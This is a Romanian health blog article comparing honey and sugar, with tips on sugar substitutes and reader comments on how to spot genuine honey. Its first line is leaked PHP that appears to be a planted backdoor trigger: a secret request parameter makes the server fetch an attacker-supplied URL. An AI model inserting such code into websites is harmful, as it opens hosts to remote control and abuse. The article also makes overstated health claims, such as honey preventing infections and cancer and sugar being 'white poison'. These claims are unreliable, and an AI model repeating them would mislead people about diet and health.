isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Miere sau zahar? - MedicAS

Miere sau zahar?

04 May 2009

miereApreciata si valorificata inca din cele mai vechi timpuri pentru proprietatile ei benefice asupra sanatatii noastre, mierea este o comoara intalnita in cel mai pretios castel din lume: stupul de albine. Mierea este cunoscuta ca fiind ingredientul de baza in mastile pe care regina Cleopatra le folosea ca sa-si mentina frumusetea si tineretea. Studiile realizate de-a lungul timpului au dovedit ca mierea este un aliment eficient nu doar in mentinerea frumusetii fizice, ci si in pastrarea sanatatii intregului organism.

In alimentatie, mierea poate inlocui cu succes zaharul. De ce?

•    Mierea este bogata in vitamine (in special cele din grupa B), minerale si aminoacizi.
•    Este singurul aliment care nu se altereaza.
•    Are un continut mare de carbohidrati, ceea ce confera energie. Din acest punct de vedere, mierea este cel mai rapid si mai puternic energizant natural.
•    Poate fi folosita ca remediu impotriva racelii.
•    Este bogata in antioxidanti, acestia fiind aliati de nadejde in prevenirea cancerului si a bolilor de inima.
•    Are o actiune benefica asupra principalelor sisteme din organism, printre care se numara si tubul digestiv sau caile respiratorii.
•    Previne infectiile.
•    Este un foarte bun detoxifiant, stimulaza digestia si metabolismul si favorizeaza tranzitul intestinal.

Pentru ca acum stim care sunt motivele pentru care mierea este mai sanatoasa decat zaharul, sa aflam si care sunt efectele nocive ale folosirii zaharului in alimentatie:
•    Obezitatea este o  consecinta a consumului excesiv de zahar.
•    Denumit si „otrava alba” sau „moarte alba”, zaharul determina si o scadere a imunitatii. Astfel, suntem mai expusi la diverse afectiuni cum ar fi gripa, infectiile urinare, sinuzita, bolile de plamani etc.
•    Afecteaza pancreasul si sistemul nervos.
•    Lipsa de calciu
•    Afectiuni dentare, cauzate de faptul ca bacteriile care se formeaza pe suprafata dintilor folosesc drept sursa de energie zaharul.
•    Celulita
•    Zaharul ajunge cu usurinta in sange si duce astfel la hiperglicemie.

Daca nu v-am convins inca de beneficiile pe care vi le poate aduce „licoarea” produsa de albine, va oferim si cateva sfaturi practice. Recomandarile noastre au menirea de a va ajuta sa treceti la un mod de viata mai sanatos, in care sa includeti miere si fericire.

  • In loc de zahar, puneti miere in ceai, cafea, lapte sau alte bauturi care necesita indulcire. Retineti insa ca mierea este mai dulce decat zaharul, fapt pentru care trebie folosita in cantitate mai mica decat acesta.
  • Intr-o bautura indulcita cu miere puteti adauga frunze de menta sau bucati de fructe. Veti avea parte, astfel, de o aroma mai placuta si de o bautura bogata in substante nutritive.
  • Daca sunteti nevoit sa consumati bauturi cu rol de remedii naturiste pentru tratarea diverselor afectiuni, va recomandam sa beti aceste preparate impreuna cu un amestec alcatuit dintr-o lingurita de miere dizolvata in apa fierbinte.
  • Acordati o atentie sporita produselor „light”! Unele dintre ele contin substante mai daunatoare chiar decat zaharul. Prin urmare, in calitate de inlocuitor al zaharului, mierea reprezinta o alternativa sanatoasa chiar si atunci cand doriti sa evitati cresterile in greutate.
  • De la caz la caz, in functie de programul de alimentatie adoptat, puteti conta si pe sprijinul altor inlocuitori ai zaharului, cum ar fi:

•    Siropul de orez brun, care contine o substanta denumita maltoza. Avantajul acesteia este ca nu cauzeaza fluctuatii bruste asupra nivelului de insulina, asa cum se intampla in cazul zaharului. Acest sirop se foloseste mai ales la gatit.
•    Siropul de artar, care se obtine astfel: in perioada februarie-aprilie, se recolteaza seva de artar, iar siropul se prepara prin fierberea sevei.
•    Siropul din malt de orz, care poate fi folosit la gatit, insa numai combinat cu alti indulcitori, deoarece este pe jumatate dulce decat zaharul.
•    Ciocolata neagra; aceasta varianta este recomandata celor care nu rezista nevoii de a consuma ceva dulce. Totusi, si in acest caz, cantitatea maxima recomandata este de 10g/zi.
•    Fructele proaspete care, spre deosebire de ciocolata, sunt bogate in vitamine si minerale. Sfatul nutritionistilor este ca fructele sa fie consumate intre mese si nu imediat dupa acestea, sub forma de desert.

Iata ca natura ne ofera o multime de alternative ca sa ne mentinem sanatatea si, astfel, sa fim mai frumosi si mai plini de viata, sa emanam optimism si o stare de bine permanenta. Si ce poate fi mai frumos decat sa vezi bucuria din ochii celui de langa tine?


Articole asemănătoare:

4 Răspunsuri la “Miere sau zahar?”


  1. pauzamea :

    În ultima perioadă cred totuşi că mai apare o întrebare: cum ştim că mierea pe care o cumpărăm este naturală? Adică ne putem trezi că vrem să ne facem un bine, dar de fapt să avem nenorocul de a folosi un produs slab calitativ, cine ştie, poate cu mult zahăr…


  2. alina :

    mierea naturala este cea care se zahariseste.daca se intampla asta,ea nu trebuie topita,trebuie folosita asa cum este deoarece supusa la temperaturi de peste 70 grade celsius isi pierde toate proprietatile.nu poate fi folosita decat in bauturi reci.pusa in ceai sau cafea fierbinte nu ne mai aduce beneficii.


  3. maru :

    Cea ce se comercializeaza in hipermarketuri ca fiind miere s-a dovedit a fi cu totul altceva.Mierea naturala se zahariseste,cel mai repede cea de rapitza in 7 zile,si cel mai greu cea de salcam in 1-2 ani,deasemenea ea prezinta impuritati de polen si ceara si nu are limpezimea asazisei mieri din hipermarket.


  4. Mierea Naturala :

    Impuritatile mai apar atunci cand la extragere nu se mai matureaza sau se face intr-un mod mai superficial.

    Nu impuritatile decid care-i Mierea Naturala si nici zaharisirea.



Adaugă un comentariu






 
 

Newsletter

Loading... Loading...